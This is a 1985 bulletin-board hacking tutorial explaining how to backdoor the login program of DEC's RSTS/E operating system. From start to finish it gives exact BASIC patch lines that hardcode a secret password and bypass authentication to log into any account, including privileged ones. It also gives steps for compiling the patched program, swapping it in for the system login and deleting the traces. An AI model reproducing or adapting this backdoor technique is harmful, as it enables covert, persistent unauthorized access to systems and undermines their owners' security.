ShadowSpawn BBS Presents... ------------------------------------------------------------------------------- INSIDE RSTS/E VOLUME III ------------------------- BY: THE MARAUDER THE COUNCIL OF THE FEDERATION The information in this document is intended for informational purposes only COPYRIGHT (C) - SEPTEMBER 13, 1985, ZONE COMMUNICATIONS ------------------------------------------------------------------------------- This tutorial will deal with a subject many talk about, but few have actually accomplished, installing a true back door into an operating system. I will assume you have managed to get a privleged account on a RSTS/E system, and have a working knowledge of the basic system commands, and are somewhat familiar with a RSTS/E based text editor, such as TECO, or EDT. This procedure should work on all versions of RSTS/E between V6.0-00, And V8.5-00. 1) GETTING STARTED. Before you actually attempt to install the patches, you need to know a few things first.. Do the following "test's".. A) before you are logged in, type any charachter followed by a the system will do 1 of two things, it will either respond with a 'Please say HELLO', or you will get the system header and the login prompt, make a note of which.. B) before you are logged in, type 'HELLO', or 'LOGIN' followed by a The system will respond with one of two possible system headers.. INTELL CORP.. RSTS/E V7.0-01 KB7: 20-MAR-85 10:47: PM # OR INTELL CORP.. RSTS/E V7.0-01 KB7: 20-MAR-85 10:47 PM User: Make a note of which login prompt you get, either a '#', or 'User: '. You'll need this when installing the patches.. 2) FINDING LOGIN. Once you have made the above tests, log into your privleged account and now you must find the basic source code for the rsts/e login program which is 'login.Bas', or on some systems 'login.B2s'. I have generally found most basic source files located in either '(1,200)', or 'DB1:(1,200)' so look there first. If you don't find a copy in either of those accounts then do a 'dir (*,*)login.*', Or a 'dir db1:(*,*)login.*'. If neither of these directory lookups show up with 'login.Bas' then you either have to upload your own copy (incidentally, all rsts/e source files are ascii.). Or you're out of luck.. (But don't panic, most systems do keep a copy of their basic programs on-line).. Note: if there are more than two drives (db1, db2), you should search these also.. (Ie. Db3:, db4:, etc..). 3) INSTALLING THE 'BACKDOOR' ITSELF. Once you have found a copy of login.Bas, move it into your account with pip, (ie. PIP LOGIN.BAS=(*,*)LOGIN.BAS, where (*,*) = the account it's currently in.). If you have uploaded it then skip that step.. Now you must use one of the systems text editors to install the patches I preffer TECO. So here you do your 'TECO LOGIN.BAS' and you're ready to go.. First of all, you must decide on a password that you would like to use I usually like to use passwords that 'include' the special charachters not allowed in normal rsts/e passwords, (ie. #,%,&,*,!). Once you have decided on the password you'd like (make it a good one, cause it will be permanent). You are ready to start the 'patching'.. Follow the next steps exactly, and type everything exactly as I have it. (I will be using '%%ZONE' as my 'BACKDOOR' password..) A) INSERT A LINE #110, HERE PUT IN 'BD$ = "WHATEVER PASSWORD YOU CHOSE" IE. 110 BD$ = "%%ZONE" B) at line 12000, count down to the 12th statement for that line. It should look something like: / WAIT 30 UNLESS A% / INPUT LINE #1%, P$ / P$=CVT$$(P$,1%+4%+8%+16+32%+128%+256%) Directly after the line that reads '/INPUT LINE #1%,P$', you will insert the following line. / GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$)) = BD$ So now it should read.. / INPUT LINE #1%, P$ / GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$))=BD$ / P$ = CVT$$(P$,1%+4%+8%+16%+32%+128%+256%) C) now insert a line 12011, and type it EXACTLY as follows. 12011 I$=SYS(PRIV.ON$) / I$=SYS(CHR$(2%)) / PRINT / INPUT "ACCOUNT #";PROJ%,PROG% / DIM M1%(30%) / M1%(X%)=0% FOR X% = 1% TO 30% / M1%(0%) = 9% / M1%(1%) = 6% / M1%(2%) = 14% / M1%(7%) = PROG% / M1%(8%) = PROJ% / CHANGE M1% TO M$ / T$ = SYS(M$) / PS$ = MID(T$,9%,4%) / M$ = CHR$(6%)+CHR$(4%)+STRING$(2%,0%)+CHR$(PROG%)+CHR$(PROJ%)+PS$ / I$ = SYS(M$) / I$ = SYS(CHR$(9%)) / GOTO 32767 (The previous line of code is what actually does the password lookup, and the login, bypassing login's normal security procedure, for those who care.) D) Now, here's where you use the information you got in step 1, 1) LIST LINE 32600 If the system you are patchng gave you the login prompt when you hit Any charachter followed by a before you were logged in, and line 32600 Reads. 32600 Q$=CHR$(9%) / PRINT FNC$;"PLEASE SAY HELLO" / TIMEOUT% = 17% Insert the following statement. 32600 Q$=CHR$(9%) / GOTO 200 <---- INSERT THIS STATEMENT / PRINT FNC$;"PLEASE SAY HELLO" / TIMEOUT% = 17% If the system printed 'Please say HELLO', upon entering any charachter before being logged in, -DO NOT- change this line. 2) List line 11000, the second statement should be one of the following / PRINT FNC$;"USER: "; OR / PRINT FNC$;"#"; If the login prompt you got in step 1 was "#", then change that statement To read '/ PRINT FNC$;"#"' (if it dosn't already read that way) If you got a "User: " prompt in step #1, then change that statement to read '/ PRINT FNC$;"User: "' (** note the space after the ':') Now, save the program and exit out of the text editor, once you are in basic do the following.. (I will assume we saved the file under the name: "LOGIN1.BAS") 1) TYPE "OLD LOGIN1.BAS" If you made any syntax errors, here's where they will show up. If you have any errors, go back and correct them with the text editor.. 2) Once you have succesfully loaded the program into basic (using 'old'), type 'COMPILE', followed by a . This will compile the program into machine Language, and automatically save a copy in your account under the extension '.BAC', so if I had loaded 'LOGIN1.BAS' (ie. OLD LOGIN1.BAS'), into memory and typed 'COMPILE', I would now have a compiled copy in my account under the name 'login1.Bac' (.Bac = basic compiled, by the way). E) SWAPPING THE PROGRAMS.. Once you have succesfully gotten this far, the last step is to swap your 'doctored' copy of login, with the systems copy of login, you do this simply by typing: "PIP (1,2)LOGIN.* = LOGIN1.BAC" (assuming you are in the same account that your copy of 'login1.Bac' is in.. Now the patch is complete download a copy of your 'patched' basic source, for use on other systems you may run across.., And then delete all copies of it.. (Except the one you pipped to account (1,2), of course.) F) USING THE 'BACKDOOR' To use the backdoor, you simply enter any 'valid' account on the system when it asks 'user: ', or print's a "#", waiting for your account #, then when it asks for a password you type in your 'backdoor' password, and login will print 'enter account #', here type in whichever account you would like to get into (ie, 1,2 - 1,3 - 1,4 - etc...) And you will be automatically logged into that account, it should rememble something like this.. (STARTING LOGGED OUT OF COURSE..) HELLO INTELL CORP.. RSTS/E V7.9 KB17: JOB 6 20-JUN-85 10:46 PM USER: 1,2 (1,2 IS ENTERED BY YOU) PASSWORD: %%ZONE (%%ZONE IS ENTERED BY YOU, AND WON'T ECHO) ACCOUNT # 1,2 (1,2 IS ENTERED BY YOU) NOW YOU WILL GET THE 'READY' PROMPT, AND BE LOGGED INTO ACCOUNT 1,2.. Now you have full acess to the system no matter what they change any password to, and for as long as they remain using any version of RSTS/E under V9.0.. So until next time.. Dial with care....... THE MARAUDER COUNCIL OF THE FEDERATION -------------------------------------------------------------------------------